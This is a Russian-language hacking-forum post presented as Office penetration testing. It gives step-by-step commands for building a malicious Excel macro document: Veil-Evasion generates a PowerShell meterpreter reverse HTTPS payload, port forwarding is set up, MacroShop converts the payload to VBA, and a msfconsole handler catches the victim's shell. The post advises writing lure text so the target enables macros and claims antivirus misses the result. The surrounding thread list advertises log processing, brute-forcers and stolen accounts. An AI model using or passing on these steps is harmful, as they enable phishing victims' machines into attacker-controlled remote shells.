Penetration Testing with Microsoft Office

Admin

Original poster
Administrator
Сообщения
916
Реакции
753
Посетить сайт
В этой статье я покажу, как можно получить доступ к удаленному компьютеру, используя Veil Evasion и Microsoft Excel. А точнее одно свойство Excel – поддержка макросов.

Макрос - это программа, которая содержит набор инструкций выполняющих какие либо действия, как автоматически, так и по требованию пользователя, т.е. выполняются явно и неявно. Широкое распространение, данное понятие получило благодаря корпорации Microsoft, которая реализовала возможность написания макросов в своих продуктах, а именно Office (Word, Excel, Access и т.д.). Используемый язык в макросах - Visual Basic, так же продукт Microsoft, но с некоторыми ограничениями. Макрокоманды, способны автоматизировать большинство процессов и значительно сократить время на обработку данных.

Способ получения Veil Evasion описан тут -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Запускаем Veil Evasion:
> ./Veil-Evasion.py

Вводим команду:
list (покажет список доступных пайлоадов)
77248797bb99eef69cb986e1d3cdb9dd.png

Мы будем использовать пайлоад с ID 23. Вводим:

> use powershell/meterpreter/rev_https

или

> use 23

Обратный протокол HTTPS, здесь будет успешно использован, в случае если файрвол у жертвы настроен таким образом, чтобы пропускать трафик по TCP. В большинстве случаев, на компьютере HTTPS не заблокирован.

Настроим Veil для нашего случая, пишем:

> set LHOST 172.16.0.199

Тут я немного прервусь, для объяснений, т.к. вопросы уже были.

Так как, я нахожусь с атакуемым компьютером в одной подсети, мы подключены к одному роутеру, то в поле LHOST я вписываю свой локальный адрес.
3fe9ab38bfaf2fb00393f4d57681340e.png

Именно на него «постучится» цель, после того как на нем сработает полезная нагрузка. Чтобы таким же образом подключится к компьютеру находящемуся в другой сети, вообще в другом городе/стране, необходимо сделать иначе. Для удобства лучше иметь статический (белый) IP адрес. К примеру, у вас роутер, вашей машине, с которой вы атакуете, был присвоен локальный адрес из диапазона 192.168.0.ХХХ. Но, в интернет вы выходите из под своего внешнего адреса, который присвоил вашему роутеру провайдер. Ваш компьютер, с которого вы проводите проникновение, находится за NAT роутера.
155bd37075fa01c23fa4f7580afd30b9.png

Допустим этот адрес 82.198.34.88, для того, чтобы целевой компьютер постучался на него мы в поле LHOST его и укажем. В опциях так же есть поле LPORT:

5ba34575950d4c26dc2dd2eb48678a28.png

Именно на этот LHOST и LPORT, будет пытаться подсоединиться цель. Затем необходимо указать роутеру, чтобы все пакеты, адресованные 8443 порту, он направлял нашей машине с Kali, у которой адрес 192.168.0.ХХХ. Для этого добавляем такое правило:

f793ca8967130fd1005d99749bebed92.png

Теперь все пакеты, которые предназначаются 443 (у меня так) порту, получит моя Kali c локальным адресом 192.168.0.101. Идем далее.

> generate
d0f7d6f86c34195a35ff0876d078f0f4.png

Вводим имя:
0b0673aed67852e7f0981033939051b7.png

Veil-Evasion сгенерировала нам файл win8.1.bat в директории - /usr/share/veil-output/source/

1668afbd9a7daf7b6109f747f7e9222c.png

Теперь откроем новое окно терминала и установим MacroShop. MacroShop представляет собой набор скриптов, помогающих в работе с пайлоадами, через Office Macros. Большинство из них, написаны на Python. Для его установки вводим:

> git clone

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



b3d92c276c33bdc3fff0901a14245aef.png

После установки, переместим файл win8.1 в директорию MacroShop.
278e0b3ea796add6279f8c4b7fa02fe7.png

Теперь, в терминале перейдем в директорию MacroShop, и пишем:

> python macro_safe.py windus.bat file.txt (windus.bat – потому, что я его пересоздал)

77ccf1f8e042655d560dba0739af21e5.png

После того, как процесс успешно завершился, откроем новый файл Excel (у себя) и проделаем следующее:

7a6c1c0b165c68c5350984e6a2090d92.png

Пишем имя макроса и создаем его. В открывшееся поле для редактирования, копируем код, который мы получили в файле – file.txt, затем сохраним макрос.

6f7f9b6c48fe72d2cf326cc8b469ba09.png

Копируем код полностью, заменяя строки которые были в начале макроса, это важно!

Сохраняем в формате, как на скриншоте:
d7e2872b46da5250e6eff300d224bd97.png

В самом документе пишем все, что угодно, нам нужно заинтересовать цель в открытии документа и включения макроса.

Теперь, когда файл оказался на целевом компьютере, у себя в терминале откроем msfconsole
0a9f5e35b43c890533c159584fb96d5b.png

и введем следующие команды:

> use multi/handler

> set payload/windows/meterpreter/reverse_https

> set LHOST 192.168.0.XXX

> set LPORT XXX (ваш порт)

> exploit


Когда на целевом хосте буде открыт дынный файл и выполнится макрос, у вас откроется сессия meterpreter, как и было обещано.
de3133dadedf2a49694b2252462f7438.png

Дальше дело техники. Спасибо за внимание.

P.S. Антивирусы не определяют данный код как вредоносный.

 
Название темы
Автор Заголовок Раздел Ответы Дата
E.Alderson Ищу наставника по penetration tester Ищу работу. Предлагаю свои услуги. 0
Eliot_lite.373 Ищу работу в сфере penetration tester, по w/b направлениям. Ищу работу. Предлагаю свои услуги. 0
Emilio_Gaviriya Статья Защита и надёжность: Важность патчей для Microsoft Active Directory. Вирусология 0
Support81 Не только умный, но и опасный: темная сторона ИИ от Microsoft Новости в сети 0
Support81 Уязвимость Microsoft Office становится временной бомбой в руках киберпреступников Новости в сети 0
Support81 Пользователи Microsoft 365 рискуют потерять аккаунт: не спасёт даже МФА Новости в сети 0
Support81 Вот это поворот: Microsoft Defender стал помечать Tor Browser как вредоносное ПО Новости в сети 2
Support81 Похитители cookie: Microsoft предупреждает о росте числа атак «человек посередине» с обходом MFA Новости в сети 0
Support81 Киберпреступники активно подделывают системы авторизации Microsoft и Adobe Новости в сети 0
phantom_gift AMAZON & MICROSOFT & PAYPAL - Отработаю ваши логи Ищу работу. Предлагаю свои услуги. 1
K kamisama refund service | Amazon 15% | Logitech | Microsoft | Ищу работу. Предлагаю свои услуги. 1
Denik Интересно Хакерская группировка АРТ31 впервые атаковала российские компании Microsoft обвиняла ее в атаке на участников выборов президнта США 2020 года Новости в сети 0
J Аккаунт microsoft azure 200$ balance Дедики/VPN/соксы/ssh 0
Denik Интересно Эксперты Microsoft нашли критические баги в роутерах Netgear Новости в сети 0
E Microsoft Defender ATP принял обновление для Chrome за троянское ПО Новости в сети 1
Р Интересно Получаем Дедик microsoft Раздача dedic/ssh/proxy 1
АнАлЬнАя ЧуПаКаБрА Microsoft.com Reg Checker || XAPIC Бруты/Парсеры/Чекеры 2
АнАлЬнАя ЧуПаКаБрА Microsoft.com Brute || XAPIC Бруты/Парсеры/Чекеры 1
O Microsoft вновь латает дыру, используемую в атаках Новости в сети 0
A Microsoft и Rust против C / C ++: Другие ЯП 0
Ltybcrf Статья Как спрятать вирус в документах Microsoft Office Вирусология 1
Uno-uno Microsoft Emails Checker Бруты/Парсеры/Чекеры 2
T Microsoft STORE - БАГ $ Полезные статьи 2
K Каталог всех видеокурсов от сертифицированого Microsoft центра ITVDN Другое 0
K Использование Windows при помощи DDE эксплойта Microsoft Office (MACROLESS) Уязвимости и взлом 0
G Уязвимость Microsoft Office CVE-2017-8570 Kali Linux 0
H Microsoft выпустила язык квантового программирования Q# Новости в сети 0
NickelBlack Ключи Активации для Microsoft Windows 2003 Server R2 Enterprise Edition Раздача (аккаунтов/ключей) 0
E Добавление программы (вируса, RMS) в Microsoft Word (через технологию OLE) Полезные статьи 20
S Microsoft выпустила патч для Windows XP, чтобы обезопасить ОС от эксплоитов АНБ Новости в сети 0
Admin Тестирования уязвимости в продукции Microsoft Office - CVE-2017-0199 Уязвимости и взлом 0
V Бесплатный дедик от Microsoft на 3 года + тонны ключей к продуктам Microsoft Раздача dedic/ssh/proxy 42
Admin Добавление exe(вируса, RMS) в Microsoft Word (через технологию OLE) Вирусология 6

Название темы